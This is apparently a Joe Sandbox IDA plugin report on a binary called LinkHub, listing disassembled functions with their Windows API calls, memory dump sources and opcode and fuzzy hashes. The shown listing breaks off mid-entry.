                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                        • String ID: msctls_updown32
                                                                                        • API String ID: 4014797782-2298589950
                                                                                        • Opcode ID: 250c9fe8fd1b71e0edaa35b3afc60a5b15461b90f502874e7503d8133db8034a
                                                                                        • Instruction ID: 180e5c1fd420664abc9c4d0d666e8724ab3add93de6e1441af8478ffa8b00ddb
                                                                                        • Opcode Fuzzy Hash: 250c9fe8fd1b71e0edaa35b3afc60a5b15461b90f502874e7503d8133db8034a
                                                                                        • Instruction Fuzzy Hash: 9121C1B5610619AFDB01CF28DC85EB737ADEF5A364B140149F9049B3A1CB30EC21DBA0
                                                                                        Function 00294253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002942DC
                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002942EC
                                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00294312
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$MoveWindow
                                                                                        • String ID: Listbox
                                                                                        • API String ID: 3315199576-2633736733
                                                                                        • Opcode ID: 1db0f4234e80e45c8a7e381933f92a8199c94d7f826dbdf2f3bf83f0622ee8d0
                                                                                        • Instruction ID: c3251dab32a5b0310ebd5ab5a0fe61b5c10ff963209e8fbcebb6259b8c594f81
                                                                                        • Opcode Fuzzy Hash: 1db0f4234e80e45c8a7e381933f92a8199c94d7f826dbdf2f3bf83f0622ee8d0
                                                                                        • Instruction Fuzzy Hash: 9621C532A20119BBDF119F94DC84FBB376EEF89754F118115F9009B190C671AC6297A0
                                                                                        Function 00275439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0027544D
                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 002754A1
                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,0029DCD0), ref: 00275515
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$InformationVolume
                                                                                        • String ID: %lu
                                                                                        • API String ID: 2507767853-685833217
                                                                                        • Opcode ID: 59d21223f813db8490ab6c6461e0f1d32e1d62965e5bdf0b9129e2e7e53dd31b
                                                                                        • Instruction ID: acc3dc166e4f0b8ee848ba3af95b976cf9465bc09cbb6cabbfc4c48a5acc74f9
                                                                                        • Opcode Fuzzy Hash: 59d21223f813db8490ab6c6461e0f1d32e1d62965e5bdf0b9129e2e7e53dd31b
                                                                                        • Instruction Fuzzy Hash: 34319371A10209AFDB10DF64C884EAAB7F8EF09304F1480A9F809DB262D771EE51DF61
                                                                                        Function 00298305 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetActiveWindow.USER32 ref: 00298339
                                                                                        • EnumChildWindows.USER32(?,0029802F,00000000), ref: 002983B0
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ActiveChildEnumLongWindows
                                                                                        • String ID: (-$(-
                                                                                        • API String ID: 3814560230-1003087410
                                                                                        • Opcode ID: e58e494d755570a4c2d3393c815798c6a4d853b00f458fb3a673ea4923ce83e9
                                                                                        • Instruction ID: 86d1d5bdd986ba666f78b1010eb2161cc473420be193ce8db390f00e263898d3
                                                                                        • Opcode Fuzzy Hash: e58e494d755570a4c2d3393c815798c6a4d853b00f458fb3a673ea4923ce83e9
                                                                                        • Instruction Fuzzy Hash: DE216934211302DFCB208F28E854A96B7E5BF5A720F24065AF869873A0DB70AC25DB64
                                                                                        Function 00294C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00294CED
                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00294D02
                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00294D0F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: msctls_trackbar32
                                                                                        • API String ID: 3850602802-1010561917
                                                                                        • Opcode ID: 66c71cac0d62ebf2205e230d2afbbb416e53ee8600fd418d88a4681eadb3d2b9
                                                                                        • Instruction ID: 7f1f606e193153bfd9836895c4399e6857113f01207cf0ec4c68bdc925bd3f31
                                                                                        • Opcode Fuzzy Hash: 66c71cac0d62ebf2205e230d2afbbb416e53ee8600fd418d88a4681eadb3d2b9
                                                                                        • Instruction Fuzzy Hash: 70113231260248BEEF206F69CC06FAB3BA8EF89B64F110115FA50E20A0C271DC21DB20
                                                                                        Function 0026389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00208577: _wcslen.LIBCMT ref: 0020858A
                                                                                          • Part of subcall function 002636F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00263712
                                                                                          • Part of subcall function 002636F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00263723
                                                                                          • Part of subcall function 002636F4: GetCurrentThreadId.KERNEL32 ref: 0026372A
                                                                                          • Part of subcall function 002636F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00263731
                                                                                        • GetFocus.USER32 ref: 002638C4
                                                                                          • Part of subcall function 0026373B: GetParent.USER32(00000000), ref: 00263746
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0026390F
                                                                                        • EnumChildWindows.USER32(?,00263987), ref: 00263937
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                        • String ID: %s%d
                                                                                        • API String ID: 1272988791-1110647743
                                                                                        • Opcode ID: 9dcf240032bd8905d0e40773ba5dc8ed63a059b5e2ae4214141944d4f5e05b7c
                                                                                        • Instruction ID: 587930c8bd56b090cfd70e4aa96cd3475088ae874589ed478cf93f4979054f52
                                                                                        • Opcode Fuzzy Hash: 9dcf240032bd8905d0e40773ba5dc8ed63a059b5e2ae4214141944d4f5e05b7c
                                                                                        • Instruction Fuzzy Hash: C411E7716102056BCF11BF74DD85AEE77AA9F94300F004069B9499B293CE705965DF30
                                                                                        Function 002059FF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(?), ref: 00205A34
                                                                                        • DestroyWindow.USER32(?,002037B8,?,?,?,?,?,00203709,?,?), ref: 00205A91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteDestroyObjectWindow
                                                                                        • String ID: <)-$<)-
                                                                                        • API String ID: 2587070983-3907340304
                                                                                        • Opcode ID: 0b64b9c9f0e7e1488161ed86e13bfe229358307d789df4549e89fc24675eb973
                                                                                        • Instruction ID: f5fe163625123fadcf1efeffb069f0601eb6a31d2e60a6a1985041d31193cc5b
                                                                                        • Opcode Fuzzy Hash: 0b64b9c9f0e7e1488161ed86e13bfe229358307d789df4549e89fc24675eb973
                                                                                        • Instruction Fuzzy Hash: 2421EA30B27656CFDB18AF15F8A8BA633E0AB64311F25415AE401972A2CB749C69CF14
                                                                                        Function 00296321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00296360
                                                                                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0029638D
                                                                                        • DrawMenuBar.USER32(?), ref: 0029639C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$InfoItem$Draw
                                                                                        • String ID: 0
                                                                                        • API String ID: 3227129158-4108050209
                                                                                        • Opcode ID: 19863d59ec054bb4f672175b3f295748e4ba831b52f701214bec0bc6e08a3a87
                                                                                        • Instruction ID: 8e2e69ddbd863ce147466d37262332779200509749cff4e68f58ec07c9c194bf
                                                                                        • Opcode Fuzzy Hash: 19863d59ec054bb4f672175b3f295748e4ba831b52f701214bec0bc6e08a3a87
                                                                                        • Instruction Fuzzy Hash: 09018031520218AFDF119F51EC88BAE7BB4FF45751F10809AE849D6151DB708AA5EF21
                                                                                        Function 0029823D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(?,002D28E0,0029AD55,000000FC,?,00000000,00000000,?), ref: 0029823F
                                                                                        • GetFocus.USER32 ref: 00298247
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                          • Part of subcall function 00202234: GetWindowLongW.USER32(?,000000EB), ref: 00202242
                                                                                        • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 002982B4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$FocusForegroundMessageSend
                                                                                        • String ID: (-
                                                                                        • API String ID: 3601265619-4239615555
                                                                                        • Opcode ID: 022cbab31f93a4448f21dcbe6974b0ac4ffae4bbf5e1bee0acda3128f785046f
                                                                                        • Instruction ID: 26535eae311e3723cac94acf402c0eb04a78fddbeb8cf3a0990892db2ab04a5e
                                                                                        • Opcode Fuzzy Hash: 022cbab31f93a4448f21dcbe6974b0ac4ffae4bbf5e1bee0acda3128f785046f
                                                                                        • Instruction Fuzzy Hash: 37017531A12541CFC715DF78E858EA573E6EB8B320F18015EE816873A1CB316C1BCB50
                                                                                        Function 00298526 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DestroyAcceleratorTable.USER32(?), ref: 00298576
                                                                                        • CreateAcceleratorTableW.USER32(00000000,?,?,?,0027BE96,00000000,00000000,?,00000001,00000002), ref: 0029858C
                                                                                        • GetForegroundWindow.USER32(?,0027BE96,00000000,00000000,?,00000001,00000002), ref: 00298595
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
                                                                                        • String ID: (-
                                                                                        • API String ID: 986409557-4239615555
                                                                                        • Opcode ID: e86cdbc890d0c42f7058d6a417ba5f9b4d8e6ed768460e70c6f8c440624090d9
                                                                                        • Instruction ID: c6fd8ee070841a25581e072008caeca12b6eeb51ae3c574f4af3a52cc23eec87
                                                                                        • Opcode Fuzzy Hash: e86cdbc890d0c42f7058d6a417ba5f9b4d8e6ed768460e70c6f8c440624090d9
                                                                                        • Instruction Fuzzy Hash: 47016930A12305CFCF249F68EC9CAA577A1FB25321F6A451AE515972B0DB30ACADDF50
                                                                                        Function 00298BCD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002D4038,002D407C), ref: 00298C1A
                                                                                        • CloseHandle.KERNEL32 ref: 00298C2C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateHandleProcess
                                                                                        • String ID: 8@-$|@-
                                                                                        • API String ID: 3712363035-4159991743
                                                                                        • Opcode ID: de3870601dce5ce1d40cd4cc1e83410a00f554dcf7c8a462dee60aa13eb2ac55
                                                                                        • Instruction ID: ba589a3cfeb1ffae5b057fafc54fc4211f606ee4d2112a6871fd8c86b872e5f9
                                                                                        • Opcode Fuzzy Hash: de3870601dce5ce1d40cd4cc1e83410a00f554dcf7c8a462dee60aa13eb2ac55
                                                                                        • Instruction Fuzzy Hash: CBF05EB2956314BBE7147BA0BC4EF773F5CEB05396F000023BB48E61A1D6764C248AB9
                                                                                        Function 0026096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 842a4212d745d6933fc9e8aa0fdf8ba186a56b6c0dc478036539f8ea0596b1f4
                                                                                        • Instruction ID: 7387558a0a06c44098e27c3221ade710e9b670eafc635e5432bef0eeeabbfea0
                                                                                        • Opcode Fuzzy Hash: 842a4212d745d6933fc9e8aa0fdf8ba186a56b6c0dc478036539f8ea0596b1f4
                                                                                        • Instruction Fuzzy Hash: 5AC16B75A10206EFDB04CF94C884EAEB7B5FF48708F208599E506EB251D771EE91EB90
                                                                                        Function 002341F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: __alldvrm$_strrchr
                                                                                        • String ID:
                                                                                        • API String ID: 1036877536-0
                                                                                        • Opcode ID: 6b642ec63ff6d3c82f2208d2655f2e81e391796f6f1882e4d3dcf0040d879e3b
                                                                                        • Instruction ID: de76c9b1992dfed8d09558498c149bfaf43f71607781ecfe2321e918279be285
                                                                                        • Opcode Fuzzy Hash: 6b642ec63ff6d3c82f2208d2655f2e81e391796f6f1882e4d3dcf0040d879e3b
                                                                                        • Instruction Fuzzy Hash: F3A17CB19203869FEB15EF18C8917AEBBE4EF11314F2441FDEA959B242C374AD61CB50
                                                                                        Function 00260D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,002A0BD4,?), ref: 00260EE0
                                                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,002A0BD4,?), ref: 00260EF8
                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,0029DCE0,000000FF,?,00000000,00000800,00000000,?,002A0BD4,?), ref: 00260F1D
                                                                                        • _memcmp.LIBVCRUNTIME ref: 00260F3E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                                        • String ID:
                                                                                        • API String ID: 314563124-0
                                                                                        • Opcode ID: 621b2de56739304e86a4f169e23377d0e5c32591f1ed336d63d85462d07669f7
                                                                                        • Instruction ID: b4e25c234457b0602649a5743d19e08c72033d5a318d2f520b75a67b86af6951
                                                                                        • Opcode Fuzzy Hash: 621b2de56739304e86a4f169e23377d0e5c32591f1ed336d63d85462d07669f7
                                                                                        • Instruction Fuzzy Hash: 82813A71A1010AEFCB04DFD4C984EEEB7B9FF89315F204558E506AB250DB71AE46DB60
                                                                                        Function 0028B0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0028B10C
                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0028B11A
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0028B1FC
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0028B20B
                                                                                          • Part of subcall function 0021E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00244D73,?), ref: 0021E395
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 1991900642-0
                                                                                        • Opcode ID: 68874a6e7c909e08ce45d77a49069d6355d5a3c34ea6f7e4be59754d66e4ab87
                                                                                        • Instruction ID: 3d1862d763f3aac2993b26a90a6d4438a63a3241e36841ec696747dbb02bbc3f
                                                                                        • Opcode Fuzzy Hash: 68874a6e7c909e08ce45d77a49069d6355d5a3c34ea6f7e4be59754d66e4ab87
                                                                                        • Instruction Fuzzy Hash: 78518E71918301AFC311EF24D886A5BBBE8FF89754F40491DF58997292EB30E924CF92
                                                                                        Function 00241711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free
                                                                                        • String ID:
                                                                                        • API String ID: 269201875-0
                                                                                        • Opcode ID: 9a1c1d99a9a5fcf016e30a723ba26000c4b65c13cb18f5f3dae43b12474f48bb
                                                                                        • Instruction ID: e466067f19912b39346b8254bf65ad88301ea0c2e83bfc0bb34af7440678d4c8
